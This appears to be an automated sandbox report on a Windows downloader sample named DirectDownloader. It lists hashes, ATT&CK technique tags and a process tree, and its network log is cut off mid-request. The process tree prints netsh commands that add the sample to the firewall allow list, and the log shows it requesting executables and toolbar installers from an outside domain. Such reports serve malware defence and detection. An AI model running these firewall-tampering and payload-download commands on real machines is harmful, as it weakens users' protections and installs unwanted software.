ca1d43c7df11837f12a37594e204bf75d59c40af5b8d24e6944f24a20a52577e

Analysis

max time kernel
140s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15/07/2024, 11:31 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe
Size

733KB
MD5

49977ea91effefa69e91faaf406309c4
SHA1

29fdbe1a0ee9d6c7aa9499f3a70ef9bffcea3dab
SHA256

ca1d43c7df11837f12a37594e204bf75d59c40af5b8d24e6944f24a20a52577e
SHA512

27a4edf9e8b9962e6b50c3ad6d2fb353c09053d17032973c74fe2ffa526d94f1e9090ffc0023e5c7ab2ea5775861188bbc5eaf77ad014852479d41891caa070f
SSDEEP

12288:13Fpj4rBRLukn+zKg2oOR2OQl5xAdmxQDgGeItGBV07XpWZhASRXHYnrmc:1VpUFRUgoOwOY5xAqQlFtWVAqRXHYrmc

Score

8^/10

evasion persistence privilege_escalation

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4728	netsh.exe
1928	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4740 wrote to memory of 4196	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	84
PID 4740 wrote to memory of 4196	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	84
PID 4740 wrote to memory of 4196	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	84
PID 4740 wrote to memory of 1996	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	86
PID 4740 wrote to memory of 1996	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	86
PID 4740 wrote to memory of 1996	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	86
PID 4740 wrote to memory of 3204	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	89
PID 4740 wrote to memory of 3204	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	89
PID 4740 wrote to memory of 3204	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	89
PID 3204 wrote to memory of 4728	3204	cmd.exe	92
PID 3204 wrote to memory of 4728	3204	cmd.exe	92
PID 3204 wrote to memory of 4728	3204	cmd.exe	92
PID 4740 wrote to memory of 1760	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	93
PID 4740 wrote to memory of 1760	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	93
PID 4740 wrote to memory of 1760	4740	49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe	93
PID 1760 wrote to memory of 1928	1760	cmd.exe	95
PID 1760 wrote to memory of 1928	1760	cmd.exe	95
PID 1760 wrote to memory of 1928	1760	cmd.exe	95

C:\Users\Admin\AppData\Local\Temp\49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4740
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\DirectDownloader"
  2⤵
  PID:4196
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C echo ifms > "C:\Users\Admin\AppData\Local\DirectDownloader\directdownloader.exe"
  2⤵
  PID:1996
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\DirectDownloader\directdownloader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3204
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\DirectDownloader\directdownloader.exe"
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4728
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\DirectDownloader\directdownloader.exe" "DirectDownloader" ENABLE
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\DirectDownloader\directdownloader.exe" "DirectDownloader" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1928

Network

DNS

73.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.159.190.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

www.directdownloader.com

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

www.directdownloader.com

IN A

Response

www.directdownloader.com

IN A

162.255.119.249
GET

http://www.directdownloader.com/stub/stub_ddlr.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

162.255.119.249:80

Request

GET /stub/stub_ddlr.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.directdownloader.com

Response

HTTP/1.1 302 Found

Date: Mon, 15 Jul 2024 11:31:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102
Connection: keep-alive
Location: http://www.google.com/enterprise/apps/business/products.html/stub/stub_ddlr.exe
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
GET

http://www.directdownloader.com/stub/OpenCL.dll

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

162.255.119.249:80

Request

GET /stub/OpenCL.dll HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.directdownloader.com

Response

HTTP/1.1 302 Found

Date: Mon, 15 Jul 2024 11:31:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 99
Connection: keep-alive
Location: http://www.google.com/enterprise/apps/business/products.html/stub/OpenCL.dll
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
GET

http://www.directdownloader.com/toolbars/BitAcceleratorDDLRinstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

162.255.119.249:80

Request

GET /toolbars/BitAcceleratorDDLRinstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.directdownloader.com

Response

HTTP/1.1 302 Found

Date: Mon, 15 Jul 2024 11:31:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 124
Connection: keep-alive
Location: http://www.google.com/enterprise/apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
GET

http://www.directdownloader.com/toolbars/optimizer.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

162.255.119.249:80

Request

GET /toolbars/optimizer.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.directdownloader.com

Response

HTTP/1.1 302 Found

Date: Mon, 15 Jul 2024 11:31:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: keep-alive
Location: http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
GET

http://www.directdownloader.com/DirectDownloaderInstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

162.255.119.249:80

Request

GET /DirectDownloaderInstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.directdownloader.com

Response

HTTP/1.1 302 Found

Date: Mon, 15 Jul 2024 11:31:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 113
Connection: keep-alive
Location: http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
DNS

www.google.com

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
GET

http://www.google.com/enterprise/apps/business/products.html/stub/stub_ddlr.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

142.250.180.4:80

Request

GET /enterprise/apps/business/products.html/stub/stub_ddlr.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Location: https://enterprise.google.com/apps/business/products.html/stub/stub_ddlr.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 273
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:05 GMT
Expires: Mon, 15 Jul 2024 11:47:05 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
GET

http://www.google.com/enterprise/apps/business/products.html/stub/OpenCL.dll

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

142.250.180.4:80

Request

GET /enterprise/apps/business/products.html/stub/OpenCL.dll HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.google.com
Connection: Keep-Alive
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://enterprise.google.com/apps/business/products.html/stub/OpenCL.dll
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 270
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:06 GMT
Expires: Mon, 15 Jul 2024 11:47:06 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
GET

http://www.google.com/enterprise/apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

142.250.180.4:80

Request

GET /enterprise/apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.google.com
Connection: Keep-Alive
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://enterprise.google.com/apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 295
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:31:18 GMT
Expires: Mon, 15 Jul 2024 12:01:18 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 2
GET

http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

142.250.180.4:80

Request

GET /enterprise/apps/business/products.html/toolbars/optimizer.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.google.com
Connection: Keep-Alive
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 277
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:07 GMT
Expires: Mon, 15 Jul 2024 11:47:07 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
GET

http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

142.250.180.4:80

Request

GET /enterprise/apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Host: www.google.com
Connection: Keep-Alive
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 284
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:08 GMT
Expires: Mon, 15 Jul 2024 11:47:08 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 852
DNS

enterprise.google.com

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

enterprise.google.com

IN A

Response

enterprise.google.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

172.217.169.78
GET

https://enterprise.google.com/apps/business/products.html/stub/stub_ddlr.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

172.217.169.78:443

Request

GET /apps/business/products.html/stub/stub_ddlr.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: enterprise.google.com

Response

HTTP/1.1 301 Moved Permanently

Location: https://gsuite.google.com/products.html/stub/stub_ddlr.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 255
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:06 GMT
Expires: Mon, 15 Jul 2024 11:47:06 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://enterprise.google.com/apps/business/products.html/stub/OpenCL.dll

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

172.217.169.78:443

Request

GET /apps/business/products.html/stub/OpenCL.dll HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: enterprise.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://gsuite.google.com/products.html/stub/OpenCL.dll
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 252
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:06 GMT
Expires: Mon, 15 Jul 2024 11:47:06 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://enterprise.google.com/apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

172.217.169.78:443

Request

GET /apps/business/products.html/toolbars/BitAcceleratorDDLRinstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: enterprise.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://gsuite.google.com/products.html/toolbars/BitAcceleratorDDLRinstaller.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 277
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:31:18 GMT
Expires: Mon, 15 Jul 2024 12:01:18 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 2
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

172.217.169.78:443

Request

GET /apps/business/products.html/toolbars/optimizer.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: enterprise.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://gsuite.google.com/products.html/toolbars/optimizer.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 259
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:07 GMT
Expires: Mon, 15 Jul 2024 11:47:07 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

172.217.169.78:443

Request

GET /apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: enterprise.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 266
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:08 GMT
Expires: Mon, 15 Jul 2024 11:47:08 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 852
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

205.47.74.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.47.74.20.in-addr.arpa

IN PTR

Response
DNS

249.119.255.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

249.119.255.162.in-addr.arpa

IN PTR

Response
DNS

4.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.180.250.142.in-addr.arpa

IN PTR

Response

4.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f41e100net
DNS

c.pki.goog

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

216.58.201.99
GET

http://c.pki.goog/r/r1.crl

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.201.99:80

Request

GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:05:37 GMT
Expires: Mon, 15 Jul 2024 11:55:37 GMT
Cache-Control: public, max-age=3000
Age: 1542
Last-Modified: Wed, 01 Nov 2023 07:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

o.pki.goog

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

216.58.201.99
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.201.99:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDJocJI3cuzOAqV4KAdwn94 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Mon, 15 Jul 2024 10:46:38 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2681
DNS

gsuite.google.com

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

gsuite.google.com

IN A

Response

gsuite.google.com

IN A

216.58.204.78
GET

https://gsuite.google.com/products.html/stub/stub_ddlr.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.204.78:443

Request

GET /products.html/stub/stub_ddlr.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: gsuite.google.com

Response

HTTP/1.1 301 Moved Permanently

Location: https://workspace.google.com/products.html/stub/stub_ddlr.exe
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 258
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:06 GMT
Expires: Mon, 15 Jul 2024 11:47:06 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://gsuite.google.com/products.html/stub/OpenCL.dll

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.204.78:443

Request

GET /products.html/stub/OpenCL.dll HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: gsuite.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://workspace.google.com/products.html/stub/OpenCL.dll
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 255
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:07 GMT
Expires: Mon, 15 Jul 2024 11:47:07 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 852
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://gsuite.google.com/products.html/toolbars/BitAcceleratorDDLRinstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.204.78:443

Request

GET /products.html/toolbars/BitAcceleratorDDLRinstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: gsuite.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://workspace.google.com/products.html/toolbars/BitAcceleratorDDLRinstaller.exe
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 280
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:31:18 GMT
Expires: Mon, 15 Jul 2024 12:01:18 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 2
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://gsuite.google.com/products.html/toolbars/optimizer.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.204.78:443

Request

GET /products.html/toolbars/optimizer.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: gsuite.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 262
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:07 GMT
Expires: Mon, 15 Jul 2024 11:47:07 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 853
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.204.78:443

Request

GET /products.html/DirectDownloaderInstaller.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
Connection: Keep-Alive
Host: gsuite.google.com
Cookie: NID=515=K82wZoKV28XBOJrg9iPxFFxaT5Fw4Trcf2FlfvhzlwvuWRWLst_cRD2rJaD1AEn1CIsE2_32MLB0q6DyfzmmNFOOydY3ZeW1wiFXqMPKOhFsAz4KQsKjamDbCQCvcWUbwO5kArpTA45BA-oQzz2qcbBYX2ubyQuj7uqo9HjiV_E

Response

HTTP/1.1 301 Moved Permanently

Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 269
X-XSS-Protection: 0
Date: Mon, 15 Jul 2024 11:17:08 GMT
Expires: Mon, 15 Jul 2024 11:47:08 GMT
Cache-Control: public, max-age=1800
Content-Type: text/html; charset=UTF-8
Age: 852
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

workspace.google.com

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN A

Response

workspace.google.com

IN A

216.58.201.110
GET

https://workspace.google.com/products.html/stub/stub_ddlr.exe

49977ea91effefa69e91faaf406309c4_JaffaCakes118.exe

Remote address:

216.58.201.110:443

Request

GET /products.html/stub/stub_ddlr.exe HTTP/1.1
Range: bytes=0-
User-Agent: downloader
